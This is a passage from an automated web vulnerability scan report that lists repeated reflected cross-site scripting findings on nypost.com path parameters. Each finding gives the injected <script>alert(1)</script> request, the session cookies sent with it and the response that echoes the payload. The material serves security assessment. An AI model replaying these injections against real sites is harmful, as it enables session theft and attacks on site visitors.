Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 706
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:56 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost5f4e3<script>alert(1)</script>4626908c455/hbx/hbx_original.js</p>
...[SNIP]...

1.215. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/hbx_original.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/hbx/hbx_original.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8b9b5<script>alert(1)</script>9814304567a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/hbx8b9b5<script>alert(1)</script>9814304567a/hbx_original.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 706
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:57 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/hbx8b9b5<script>alert(1)</script>9814304567a/hbx_original.js</p>
...[SNIP]...

1.216. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/hbx_original.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/hbx/hbx_original.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b6083<script>alert(1)</script>b0e9792fce3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/hbx/hbx_original.jsb6083<script>alert(1)</script>b0e9792fce3 HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 706
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:57 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/hbx/hbx_original.jsb6083<script>alert(1)</script>b0e9792fce3</p>
...[SNIP]...

1.217. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/migration.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/hbx/migration.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4e628<script>alert(1)</script>09a97cae6a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig4e628<script>alert(1)</script>09a97cae6a7/WebPortal/nypost/hbx/migration.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:56 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig4e628<script>alert(1)</script>09a97cae6a7/WebPortal/nypost/hbx/migration.js</p>
...[SNIP]...

1.218. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/migration.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/hbx/migration.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 49517<script>alert(1)</script>7edb2c58dea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal49517<script>alert(1)</script>7edb2c58dea/nypost/hbx/migration.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:57 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal49517<script>alert(1)</script>7edb2c58dea/nypost/hbx/migration.js</p>
...[SNIP]...

1.219. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/migration.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/hbx/migration.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 31844<script>alert(1)</script>2dee1e689aa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost31844<script>alert(1)</script>2dee1e689aa/hbx/migration.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:57 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost31844<script>alert(1)</script>2dee1e689aa/hbx/migration.js</p>
...[SNIP]...

1.220. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/migration.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/hbx/migration.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 84686<script>alert(1)</script>228cd1853ec was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/hbx84686<script>alert(1)</script>228cd1853ec/migration.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:58 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/hbx84686<script>alert(1)</script>228cd1853ec/migration.js</p>
...[SNIP]...

1.221. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/migration.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/hbx/migration.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload c5e4a<script>alert(1)</script>77b6c01c39d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/hbx/migration.jsc5e4a<script>alert(1)</script>77b6c01c39d HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:58 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/hbx/migration.jsc5e4a<script>alert(1)</script>77b6c01c39d</p>
...[SNIP]...

1.222. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/ntpagetag.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/hbx/ntpagetag.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload aaf57<script>alert(1)</script>d9e1ed63c86 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfigaaf57<script>alert(1)</script>d9e1ed63c86/WebPortal/nypost/hbx/ntpagetag.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:56 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfigaaf57<script>alert(1)</script>d9e1ed63c86/WebPortal/nypost/hbx/ntpagetag.js</p>
...[SNIP]...

1.223. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/ntpagetag.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/hbx/ntpagetag.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1a574<script>alert(1)</script>aaf8695b0eb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal1a574<script>alert(1)</script>aaf8695b0eb/nypost/hbx/ntpagetag.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:57 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal1a574<script>alert(1)</script>aaf8695b0eb/nypost/hbx/ntpagetag.js</p>
...[SNIP]...

1.224. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/ntpagetag.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/hbx/ntpagetag.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 124c8<script>alert(1)</script>4a6d53f8624 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost124c8<script>alert(1)</script>4a6d53f8624/hbx/ntpagetag.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:57 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost124c8<script>alert(1)</script>4a6d53f8624/hbx/ntpagetag.js</p>
...[SNIP]...

1.225. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/ntpagetag.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/hbx/ntpagetag.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ded23<script>alert(1)</script>e53663e38e0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/hbxded23<script>alert(1)</script>e53663e38e0/ntpagetag.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:58 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/hbxded23<script>alert(1)</script>e53663e38e0/ntpagetag.js</p>
...[SNIP]...

1.226. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/ntpagetag.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/hbx/ntpagetag.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 83680<script>alert(1)</script>b26a91359a1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/hbx/ntpagetag.js83680<script>alert(1)</script>b26a91359a1 HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:58 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/hbx/ntpagetag.js83680<script>alert(1)</script>b26a91359a1</p>
...[SNIP]...

1.227. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/hbx_original.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/hbx_original.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b158d<script>alert(1)</script>8eb8422dc3c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfigb158d<script>alert(1)</script>8eb8422dc3c/WebPortal/nypost/unica/hbx_original.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:44 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfigb158d<script>alert(1)</script>8eb8422dc3c/WebPortal/nypost/unica/hbx_original.js</p>
...[SNIP]...

1.228. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/hbx_original.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/hbx_original.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ac67d<script>alert(1)</script>f5d5330c430 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortalac67d<script>alert(1)</script>f5d5330c430/nypost/unica/hbx_original.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
